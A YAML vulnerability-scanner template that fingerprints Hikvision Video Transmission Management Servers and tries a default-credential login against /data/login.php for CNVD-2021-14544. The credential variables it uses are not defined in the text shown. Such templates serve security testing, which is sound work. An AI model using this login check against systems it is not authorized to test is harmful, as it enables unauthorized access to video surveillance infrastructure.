id: poc-yaml-hikvision-cnvd-2021-14544-default-password

info:
  name: poc-yaml-hikvision-cnvd-2021-14544-default-password
  author: Raiynin
  severity: medium
  tags: xray-converted,cnvd-2021-14544,ct-158272
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-14544

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "<TITLE>Video Transmission Management Server</TITLE>"
  - raw:
      - |
        POST /data/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        userName={{userName}}&password={{password}}
        

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "0"